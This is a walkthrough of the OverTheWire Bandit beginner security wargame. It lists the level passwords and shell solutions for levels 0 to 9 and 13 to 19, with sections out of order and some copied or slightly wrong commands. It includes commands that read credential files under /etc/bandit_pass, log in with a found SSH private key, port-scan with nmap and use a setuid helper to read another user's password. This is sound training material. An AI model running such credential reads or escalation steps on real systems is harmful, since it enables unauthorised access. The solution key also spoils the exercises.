ssh bandit13@bandit.labs.overthewire.org

pass: 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

It is quite simple. When we login to account bandit13, we see a private SSH Key in the home directory. Supply SSH utility with it to login as bandit14. After that, we aim at /etc/bandit_pass directory and search for /etc/bandit_pass/bandit14 to know the password for bandit14 password. Here is how we do that:

ssh bandit14@localhost -i sshkey.private
cat /etc/bandit_pass/bandit14

Level 14

ssh bandit14@bandit.labs.overthewire.org

pass: 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

In this level our objective is to submit our current password to the server on port 30000. A simple command using netcat can be used here.

cat /etc/bandit_pass/bandit14 | nc localhost 30000

Level 15

ssh bandit15@bandit.labs.overthewire.org

pass: BfMYroe26WYalil77FoDi9qh59eK5xNr

Similar to level14, we need to send our current password to port 30001. However, this time we need to use SSL.

cat /etc/bandit_pass/bandit15 | openssl s_client -quiet -connect localhost:30001

Another solution:

ncat --ssl localhost 30001
# (paste password for level15)

Level 16

ssh bandit16@bandit.labs.overthewire.org

pass: cluFn7wTiGryunymYOu4RcffSxQluehd

The direction gives us a range of ports, 31000-32000. Our target port is using SSL and will give us the next password if we supply with our current password. First we need to port scan it to detect which port is active. We also use nmap to scan service version if possible.

nmap -p31000-32000 localhost -sV

Here we have several open ports:

Starting Nmap 6.40 ( http://nmap.org ) at 2014-12-13 23:03 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00100s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE VERSION
31046/tcp open  echo
31518/tcp open  msdtc   Microsoft Distributed Transaction Coordinator (error)
31691/tcp open  echo
31790/tcp open  msdtc   Microsoft Distributed Transaction Coordinator (error)
31960/tcp open  echo
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.31 seconds

However 31046, 31691, and 31960 is out, since those are echo or SSH server. The possible ones are 31518 and 31790, so we will just try both of them.

cat /etc/bandit_pass/bandit16 | openssl s_client -quiet -connect localhost:31518

Port 31518 doesn’t gives anything back so our hope is now 31790.

cat /etc/bandit_pass/bandit16 | openssl s_client -quiet -connect localhost:31790

We get a RSA private key, save the key as /tmp/bandit17.passkey then login to bandit17 and get the password.

ssh bandit14@localhost -i sshkey.private
cat /etc/bandit_pass/bandit14

Level 17

ssh bandit17@bandit.labs.overthewire.org

pass: xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

We are given two files: password.old and password.new. The new password is the only line different between two, so we can use diff to find it.

diff password.new password.old

Level 18

ssh bandit18@bandit.labs.overthewire.org

pass: kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

Someone has modified .bashrc to immediately log us out when we are trying to login. We can run commands as we login and then see the password stored in ~/readme.

ssh bandit18@bandit.labs.overthewire.org -t 'cat readme'

Level 19

ssh bandit19@bandit.labs.overthewire.org

pass: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

In this level we are given setuid binary in the home directory. We don’t know yet what to do so we see the usage by run it without arguments. After learning how to run it, we can use it for our purpose.

./bandit20-do cat /etc/bandit_pass/bandit20

OverTheWire.org Wargames – Bandit – Level 0 to Level 9

OverTheWire.org is one of good site offer WarGames. In this context, WarGame is a game specifically designed to help people learn and practice security concepts in the form of fun-filled game. One of wargame category provided by OverTheWire is Bandit category which is aimed at absolute beginners.

This writeup contains solutions of the OverTheWire challenges Bandit category which I solved. The solutions written here is for level 0 to level 9.

Jump Table

How to Play

Bandit, like other games, is organized in levels. We start playing at level 0 and try to “beat” or “finish” it. Finishing a level results in information on how to start the next level. Every level beaten will give clue how to start next level.

There are several things you can try when you are unsure how to continue:

  • First, if you know a command, but don’t know how to use it, try the manual (man page) by entering “man <command>” (without the quotes). e.g. if you know about the “ls” command, type: man ls. The “man” command also has a manual, try it. Press q to quit the man command.
  • Second, if there is no man page, the command might be a shell built-in. In that case use the “help <X>” command. E.g. help cd
  • Also, your favorite search-engine is your friend.
  • Lastly, if you are still stuck, you can join us on IRC

Level 0

ssh bandit0@bandit.labs.overthewire.org

pass: bandit0

The simplest challenge. You only need to login to the system via SSH. Once you are in, get the password for next level by:

cat readme

Level 1

ssh bandit1@bandit.labs.overthewire.org

pass: boJ9jbbUNNfktd78OOpsqOltutMc3MY1

Another simple challenge. Once you are login, you will notice a file on home directory named ‘-‘. Since the dash is a special character, we need special treatment.

cat ./-

Level 2

ssh bandit2@bandit.labs.overthewire.org

pass: CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

Another simple challenge. Once you are login, you will notice a file on home directory named “spaces in this filename” (without quote). There are spaces in the filename, so we need extra treatment. There are two ways to solve this: write the filename in the quote, use escape character. Pick one.

cat "spaces in this filename"
cat spaces in this filename

Level 3

ssh bandit3@bandit.labs.overthewire.org

pass: UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

There is a folder called inhere. It apperas blank at the first glance. However it’s not the case, there is a hidden file there.

cd inhere
ls -la
cat .hidden

Level 4

ssh bandit4@bandit.labs.overthewire.org

pass: pIwrPrtPN36QITSp3EQaw936yaFoFgAB

Still, there is a directory called inhere. There we have few files inside. The direction said, password is the only human readable file, so with the file command we can see that the only ASCII text file is “-file07″

cd inhere
file ./*
cat "file07"

Level 5

ssh bandit5@bandit.labs.overthewire.org

pass: koReBOKuIDDepwhWk7jZC0RTdopnAYKh

A folder with a bunch of folders inside, recursively. The direction told us the file containing password is 1033 bytes and we have to find a file with specific size.

cd inhere
find . -type f -size 1033c
cat ./maybehere07/.file2

Another solution:

cd inhere
ls -Rla . | awk '/:$/&&f{s=$0;f=0}
    /:$/&&!f{sub(/:$/,"");s=$0;f=1;next}
    NF&&f{ print s"/"$0 }' | grep 1033

Level 6

ssh bandit6@bandit.labs.overthewire.org

pass: DXjZPULLxYr17uwoI01bNLQbtFemEgo7

Nothing on our home directory. The file is located somewhere on the server with the user bandit7 and the group bandit6. It also has 33 byets in size.

find / -type f -user bandit7 -group bandit6 -size 33c 2> /dev/null
cat /var/lib/dpkg/info/bandit7.password

Another solution:

ls -Rla / | awk '/:$/&&f{s=$0;f=0}
    /:$/&&!f{sub(/:$/,"");s=$0;f=1;next}
    NF&&f{ print s"/"$0 }' | grep '33|bandit5'

Level 7

ssh bandit7@bandit.labs.overthewire.org

pass: HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

There is a file called data.txt in our home directory. It is a huge file we need to parse through. The password is located next to word millionth. We can simply use grep to solve this.

grep "millionth" data.txt

Level 8

ssh bandit8@bandit.labs.overthewire.org

pass: cvX2JJa4CFALtqS87jk27qwqGhBM9plV

Password is found on the only unique line in the file data.txt. We can use sort and uniq to find it.

sort data.txt | uniq -u

Level 9

ssh bandit9@bandit.labs.overthewire.org

pass: UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

Now it’s on binary file. We can’t easily grep through it. However we can use strings then grep through it. The direction said that the password is on one of the only lines beginning with an equal sign.

strings data.txt | grep =